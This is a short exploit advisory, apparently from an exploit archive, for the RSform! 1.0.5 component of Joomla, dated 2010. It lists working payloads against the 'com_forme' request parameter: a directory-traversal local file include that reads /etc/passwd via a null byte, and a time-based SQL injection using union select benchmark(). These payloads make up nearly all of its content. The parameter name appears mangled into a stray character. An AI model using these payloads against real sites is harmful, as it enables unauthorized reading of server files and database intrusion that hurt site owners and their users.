21 lines
No EOL
459 B
Text
21 lines
No EOL
459 B
Text
# Exploit Title: RSform! 1.0.5 (Joomla) Multiple Vulnerabilities
|
|
# Date: 06.11.2010
|
|
# Author: jdc
|
|
# Software Link:
|
|
http://extensions.joomla.org/extensions/contacts-and-feedback/forms/2265
|
|
# Version: 1.0.5
|
|
|
|
Local File Include
|
|
------------------
|
|
?option=com_forme
|
|
〈=../../../../../../../../../etc/passwd%00
|
|
|
|
SQL Injection
|
|
-------------
|
|
?option=com_forme
|
|
〈=-1' union select benchmark(1000000,md5(1)) -- '
|
|
|
|
NOTE: RSform! Pro is not affected...
|
|
|
|
6 Nov 2010
|
|
jdc |